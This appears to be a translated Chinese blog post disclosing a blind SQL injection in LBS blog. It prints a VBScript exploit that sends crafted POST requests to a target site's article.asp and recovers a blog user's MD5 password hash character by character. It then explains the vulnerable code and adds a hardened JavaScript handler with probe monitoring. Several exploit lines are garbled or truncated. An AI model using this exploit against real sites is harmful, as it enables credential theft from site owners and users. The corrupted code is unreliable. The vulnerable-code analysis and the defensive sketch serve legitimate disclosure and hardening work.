LBS blog SQL injection vulnerability [All versions] - an official patch already exists

Author: official lottery mobile betting site - server operations

Heh, this is just to prove the vulnerability exists. The exploit is below; save it as a .vbs file, download a copy of the program and test it yourself.

```vbs
'From 剑心
'============================================================================
'Usage:
'At the command prompt:
'cscript.exe lbsblog.vbs <blog path of the site to attack> <valid article id> <blog user whose password to crack>
'e.g.:
'cscript.exe lbsblog.vbs www.xxxx.com/blog/ 11
'by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML            'XMLHTTP object used to open the target URL
Dim TargetURL          'target URL
Dim userid, articleid  'blog user name
Dim TempStr            'holds the part of the MD5 password obtained so far
Dim CharHex            'hexadecimal character set
Dim charset
Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()
Set olbsXML = createObject
'complete the target URL
TargetURL = oArgs
If LCase <> "
If right <> "/" Then TargetURL = TargetURL & "/"
TargetURL = TargetURL & "article.asp"
articleid = oArgs
TempStr = ""
CharHex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")
WScript.echo "LBS blog All version Exploit" & vbcrlf
WScript.echo "By 剑心" & vbcrlf
WScript.echo "
WScript.echo "+ Fuck the site now" & vbcrlf
Call main
Set oBokeXML = Nothing
'---------------------------------------------- sub -------------------------------------------------------
'============================================
'Function name: main
'Purpose: main routine, obtains the blog user's password via injection
'============================================
Sub main
    Dim MainOffset, SubOffset, TempLen, OpenURL, GetPage
    For MainOffset = 1 To 40
        For SubOffset = 0 To 15
            TempLen = 0
            postdata = ""
            postdata = articleid & " and (select left(user_password," & MainOffset & ") from blog_user where user_)='" & TempStr & CharHex & "'"
            OpenURL = TargetURL
            olbsXML.open "Post", OpenURL, False, "", ""
            olbsXML.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            olbsXML.send "act=delete&deleted") <> 0 Then
                '"博客用户不存在或填写的资料有误" (blog user does not exist or the submitted data is wrong) is the error marker; getting it means the guessed MD5 is incorrect
                'If you get an MD5 value of 0000000000000000, change the error marker
            ElseIf InStr <> 0 Then
                TempStr = TempStr & CharHex
                WScript.Echo "+ Crack now: " & TempStr
                Exit for
            Else
                WScript.echo vbcrlf & "Something error" & vbcrlf
                WScript.echo vbcrlf & GetPage & vbcrlf
                WScript.Quit
            End If
        next
    Next
    WScript.Echo vbcrlf & "+ We Got It: " & TempStr & vbcrlf & vbcrlf & ":P Don't Be evil"
End sub
'============================================
'Function name: BytesToBstr
'Purpose: convert the content of the XMLHTTP object to GB2312 encoding
'============================================
Function BytesToBstr
    dim objstream
    set objstream = createObject
    objstream.Type = 1
    objstream.Mode = 3
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = "GB2312"
    BytesToBstr = objstream.ReadText
    objstream.Close
    set objstream = nothing
End Function
'============================
'Function name: ShowUsage
'Purpose: print the usage message
'============================
Sub ShowUsage()
    WScript.echo "LBS blog Exploit" & vbcrlf & "By Loveshell/剑心"
    WScript.echo "Usage:" & vbcrlf & "CScript " & WScript.ScriptFullName & " TargetURL BlogName"
    WScript.echo "Example:" & vbcrlf & "CScript " & WScript.ScriptFullName & " "
    WScript.echo ""
    WScript.Quit
End Sub
```

Vulnerability explanation:

In src_article.asp:

```javascript
......
input["log_id"] = func.checkInt;
if {
    strError = lang["invalid_parameter"];
} else {
    // Check if the article exists
    theArticle.load("log_id,log_authorID,log_catID", "log_id"]);
    strError = false;
}
......
```

What gets filtered is log_id, but what is actually used is id, heh :)

And then? The code in class/article.asp:

```javascript
this.load = function {
    var tmpA = connBlog.query("select TOP 1 " + strselect + " FROM [blog_Article] where " + strwhere);
    if {
        this.fill;
        return true;
    } else {
        return false;
    }
}
```

No need to explain the above, heh. But triggering it requires a condition; let's see whether it can be met!

```javascript
function articledelete() {
    if (theUser.rights["delete"] < 1) {
        // Check User Right - without DB Query
        pageHeader;
        redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back;
    } else {
        var theArticle = new lbsArticle();
        var strError;
```

By default, guest has delete rights. Although a check is done afterwards, the injection has already happened, and we use exactly that check for the injection, heh.
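The defect described above has two parts: the integer check is applied to one variable (`log_id`) while the raw request value (`id`) is concatenated into the SQL text, and a blind guessing loop then needs hundreds of requests against one article to recover a hash one hex digit at a time. The following Node.js sketch is an added illustration, not code from LBS blog: it reproduces the vulnerable shape beside a hardened handler that validates the value it actually uses, binds it as a query parameter, and counts rejected requests per client so that a guessing loop becomes visible. All names (`checkInt`, `strictInt`, `buildWhereVulnerable`, `buildWhereFixed`, `createProbeMonitor`, `handleDelete`), the request shape and the parseInt-style behaviour assumed for the lenient check are assumptions for this sketch, not identifiers or behaviour taken from the LBS source.

```javascript
// Added example (not LBS blog code). Models the validate-one-value, use-another defect
// from the page beside a hardened handler with per-client rejection monitoring.
// Names, request shape and the lenient-check behaviour are assumptions.

// Lenient integer check, assumed to behave like a parseInt-style helper: a value such
// as "11 abc" still yields 11, so anything appended after the number survives the check.
function checkInt(value) {
  const n = parseInt(String(value), 10);
  return Number.isNaN(n) ? 0 : n;
}

// Strict integer check: only a whole decimal string is accepted.
function strictInt(value) {
  return /^\d+$/.test(String(value)) ? Number(value) : null;
}

// Vulnerable shape: the check runs on a copy, the unvalidated string reaches the query.
function buildWhereVulnerable(request) {
  const input = { log_id: checkInt(request.id) };
  if (input.log_id < 1) return { error: "invalid_parameter" };
  return { where: "log_id=" + request.id }; // raw request value concatenated into SQL
}

// Hardened shape: the only value that reaches the query is the one that passed the
// strict check, and it travels as a bound parameter rather than as query text.
function buildWhereFixed(request) {
  const logId = strictInt(request.id);
  if (logId === null || logId < 1) return { error: "invalid_parameter" };
  return { where: "log_id=?", params: [logId] };
}

// Per-client rejection counter. A user mistyping an id produces one or two rejections;
// a character-by-character guessing loop produces one rejected request per guess.
function createProbeMonitor(threshold) {
  const rejectedByClient = new Map();
  return {
    record(clientIp) {
      const n = (rejectedByClient.get(clientIp) || 0) + 1;
      rejectedByClient.set(clientIp, n);
      return n;
    },
    flagged() {
      return [...rejectedByClient].filter(([, n]) => n >= threshold).map(([ip]) => ip);
    },
  };
}

// Hardened delete handler: rights are checked before any query is built, the id is
// validated strictly, and every rejection feeds the monitor.
function handleDelete(request, user, monitor) {
  if (!user || (user.rights.delete || 0) < 1) return { status: "no_rights" };
  const built = buildWhereFixed(request);
  if (built.error) {
    monitor.record(request.clientIp);
    return { status: "rejected", reason: built.error };
  }
  return {
    status: "ok",
    query: "SELECT TOP 1 log_id FROM [blog_Article] WHERE " + built.where,
    params: built.params,
  };
}

// Constructed sample traffic: one legitimate request from one client and a burst of
// requests from another whose ids carry an appended condition, as a boolean probe does.
function runSample() {
  const monitor = createProbeMonitor(20);
  const editor = { rights: { delete: 1 } };
  const results = [handleDelete({ id: "11", clientIp: "10.0.0.5" }, editor, monitor)];
  for (let i = 0; i < 25; i++) {
    results.push(handleDelete({ id: "11 and (" + i + "=" + i + ")", clientIp: "10.0.0.9" }, editor, monitor));
  }
  return { results, flagged: monitor.flagged() };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(buildWhereVulnerable({ id: "11 abc" })); // suffix reaches the SQL text
  console.log(buildWhereFixed({ id: "11 abc" }));      // rejected
  console.log(runSample().flagged);                    // the bursting client
}
```

The monitor threshold of 20 is a sample value; the point is that a legitimate user never needs dozens of rejected ids for one article, whereas the loop in the script above needs up to 16 requests per recovered hex digit.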
